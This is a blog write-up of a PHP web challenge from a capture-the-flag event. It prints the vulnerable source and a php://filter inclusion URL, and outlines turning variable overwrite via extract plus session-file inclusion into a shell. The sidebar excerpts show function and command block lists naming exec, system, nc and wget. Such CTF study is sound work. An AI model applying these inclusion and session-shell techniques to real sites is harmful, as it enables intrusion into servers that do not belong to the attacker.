BMZCTF:Bestphp

最新推荐文章于 2024-08-01 07:24:50 发布
最新推荐文章于 2024-08-01 07:24:50 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/116127906
版权 
http://www.bmzclub.cn/challenges#Bestphp

在这里插入图片描述
index.php

<?php
    highlight_file(__FILE__);
    error_reporting(0);
    ini_set('open_basedir', '/var/www/html:/tmp');
    $file = 'function.php';
    $func = isset($_GET['function'])?$_GET['function']:'filters'; 
    call_user_func($func,$_GET);
    include($file);
    session_start();
    $_SESSION['name'] = $_POST['name'];
    if($_SESSION['name']=='admin'){
        header('location:admin.php');
    }
?>

open_basedir限制访问文件活动目录为:/var/www/html/tmp
call_user_func($func,$_GET);回调函数名和参数都可控,$_SESSION['name']可控
通过回调extract($file),覆盖掉$file = 'function.php',即可控制$file,进行文件包含

/index.php?function=extract&file=php://filter/convert.base64-encode/resource=function.php

function.php

<?php
function filters($data){
    foreach($data as $key=>$value){
        if(preg_match('/eval|assert|exec|passthru|glob|system|popen/i',$value)){
            die('Do not hack me!');
        }
    }
}
?>

admin.php

<?php
if(empty($_SESSION['name'])){
    session_start();
    #echo 'hello ' + $_SESSION['name'];
}else{
    die('you must login with admin');
}
?>

$_SESSION['name']可控,可以将shell写入session文件,然后包含利用。session的默认保存位置有如下:

/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions/sess_PHPSESSID

/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID

测试了下发现session并不在/tmp下,应该在/var/lib下,但是open_basedir的限制,我们包含不了除指定目录下的任何其他文件,但是我们可以重新调用session_start(),并且设置save_path为我们可访问的目录下
在这里插入图片描述
在这里插入图片描述
然后覆盖$file去包含/tmp/sess_PHPSESSID
在这里插入图片描述
在这里插入图片描述

末 初
关注
专栏目录
二、BMZCTF-[easy_php]-[本地复现]-[简单的代码审计]
qwsn
01-01 2268
1.addslashes($string):对字符串参数中的预定义字符进行转义,并返回转义后的字符串 2.__DIR__:取出当前脚本执行的物理路径 3.PD9waHAKJExBTkdbJ21lbWJlcl9tYW5hZ2UnXSA9ICdhZG1pbic7Cj8+Cg== <?php $LANG['member_manage'] = 'admin'; ?> 4.file_get_contents — 将整个文件读入一个字符串 5.file_put_contents — 将一个字符串写入
BMZCTF 2018 安洵杯 boooooom
qq_26243045的博客
11-26 399
下载压缩包后发现360提示有加密的压缩文件,所以先用Advanced Archive Password Recovery爆破一下。 爆破出密码:3862 查看解压缩的password.py import base64 import hashlib f = open("password.txt",'r') password = f.readline() b64_str = base64.b64encode(password.encode('utf-8')) hash = hashlib.md5()
bestphp reveng
羽的博客
05-28 494
知识点: 利用soap触发ssrf session反序列化 call_user_func的使用 源码如下: #index.php <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name']; } var_dump($_SESSION
ctfshow 大赛原题 web689--web695
最新发布
2301_81040377的博客
08-01 1008
path这里可以写入文件这里的%26是但是如果直接写的话不能正确的绕过,必须写url形式写马方便。
[BMZCTF]-SCTF 2018_Simple PHP
cjdgg的博客
05-28 214
[BMZCTF]-SCTF 2018_Simple PHP 这题题目界面很简洁,又是就几个输入框,不管输入啥都是报错登录错误,考点不是注入,又注意到url,可以试试一些协议读取信息 这里成功读到login.php源代码 但是解码后发现是一对乱码,就很离谱,那就试试能不能直接读flag文件 好在flag文件可以直接读出来 ...
bestphp‘s revenge/ 安洵杯Babyphpphpsession题目)
qq_62046696的博客
11-30 1217
改变phpsessionid为我们编写代码的那个值就可以获得flag大概思路是这样,等题目上平台,再复现。
ctfshow—PHP特性
cosmoslin的博客
09-14 2303
PHP特性 以ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
bestphp‘s revenge
m0_63045593的博客
04-22 344
bestphp’s revenge <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name']; } var_dump($_SESSION); $a = array(reset($_SESSION), 'welcome_to_th
------已搬运-------BUUCTF:LCTFbestphp‘s revenge
Zero_Adam的博客
02-01 550
我弄这个题一整天了,晚上不出意外的话还得看,先这样吧。。 里面还有很多疑问点,希望能有大佬指点 要用到的很多很多的知识点,,, sesion反序列化–>soap(ssrf+crlf)–>call_user_func激活soap类(抄袭的,我哪能总结出来啊,,,) call_user_func函数 这个我自己总结的,看看 自己写的 extract extract()函数,从数组中把变量导入当前页面,相同的变量会被覆盖。 所以下面的b=extract,同时$POST是一个数组,所以符合 reset(
计网实验总结一:路由器配置
weixin_44682507的博客
06-28 4885
用思科软件来完成实验 实验一:路由器配置(端口ip配置 – 静态路由配置(路由表) - ACL(访问控制列表)配置应用) 实验拓扑图 1.设置两PC,两路由各端口的ip地址和连接 关电源- 添加WIC-1T(serial口)-开电源电源- 用带时钟频率的串口线连接。 路由间用serial口线(串口线), 路由主机间用Fastethernet线 配置两PC的ip地址 配置路由各个接口的ip地址,时钟频率 2.配置(静态)路由表:目的网络ip地址,下步路由器的ip地址 查看:路由器所有端口状态,某个.
GXUTF_easy_伪协议
chen_3002的博客
10-11 103
题目如下 <?php ini_set('open_basedir','/var/www/html/protocols/'); highlight_file(__FILE__); $file=$_GET['file']; $text=$_GET['text']; if(isset($text)&&(file_get_contents($text,'r')==='how_to_bypass?')){ $ext=pathinfo($file,PATHINFO_EX...
php反序列化之字符逃逸
qq_53856457的博客
05-14 1750
php反序列化之字符逃逸法 1.按我的理解,反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。如下序列化: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列化结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
BUUCTF WEB CyperPunk
qq_41696858的博客
03-08 530
打开场景,查看源码,发现hint <!--?file=?--> 于是考虑文件读取漏洞 尝试?file=php://filter/convert.base64-encode/reosurce=index.php 成功回显 PD9waHAKCmluaV9zZXQoJ29wZW5fYmFzZWRpcicsICcvdmFyL3d3dy9odG1sLycpOwoKLy8gJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwokZmlsZSA9IChpc3NldCgkX0dFVFsnZmlsZSd
绕过 open_basedir
m0_64180167的博客
08-11 959
open_basedir是php.ini的设置在open_basedir设置路径的话 那么网站访问的时候 无法访问除了设置以外的内容这里还有一个知识点如果我们设置 open_basedir=/var/www/html那我们只能访问不能访问/var/www/otherfile.php(不在指定目录之下)/var/www/html2/index.php(不是以指定路径为前缀)所以open_basedir并不是以目录名为 规定而是路径我创建了一个test文件夹 存放着 1.php
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 6135
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
[CTFSHOW]PHP特性
Huamang的博客
03-19 1776
web 89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 利用数组绕过:/?num[]=0 web 90 include
php strtoup,PHP 7 的几处函数安全小变化
weixin_39997443的博客
03-09 254
To Begin With最近在准备 LANCTF,想把环境迁移到 PHP 7,却想到一些 payload 失效了。想着什么时候总结成一个笔记,恰巧在 FB 发现有人写了一篇博文,拜读后结合 CTF 环境整理了一下,总体来说,弃用了较多不安全的使用方式,但运行环境未过多限制时仍可使用。测试环境docker pull php:7.3.3-apachedocker pull php:7.0-apach...
CTFSHOW-命令执行
Monica的博客
09-03 4194
WEB29 题目: <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 分析:题目过滤了flag且忽略大小写 知识点:linux通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符..
SWPUCTF 2021 新生赛 RCE题目
m0_74160536的博客
05-26 637
查看代码,这段 PHP 代码接受一个名为 “url” 的 GET 请求参数,然后使用 preg_match 函数对该参数进行正则匹配,检查其中是否包含一些危险的命令和特殊符号,比如 bash、nc、wget、ping、ls、cat、more、less、phpinfo、base64、echo、php、python、mv、cp、la、-、*、"、>、
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值